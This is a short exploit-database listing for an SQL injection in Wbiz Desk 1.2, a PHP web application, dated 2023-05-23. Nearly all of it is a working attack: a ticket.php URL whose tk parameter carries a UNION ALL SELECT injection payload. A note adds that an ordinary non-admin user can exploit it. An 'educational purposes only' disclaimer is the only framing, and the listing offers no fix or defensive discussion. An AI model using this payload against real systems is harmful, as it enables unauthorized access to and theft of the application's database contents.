Exploits / Vulnerability Discovered : 2023-05-23 |
Type : webapps |
Platform : php
This exploit / vulnerability Wbiz desk 1.2 sql injection is for educational purposes only and if it is used you will do on your own risk!
[path]/ticket.php?tk=83' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6a6b71,0x534d6e485a74664750746b7553746a556b414e7064624b7672626b42454c74674f5669436a466a53,0x71626b6b71),NULL,NULL,NULL-- -
[#] Notes:
- The vulnerability requires a non-admin privilege (normal) user to be exploited.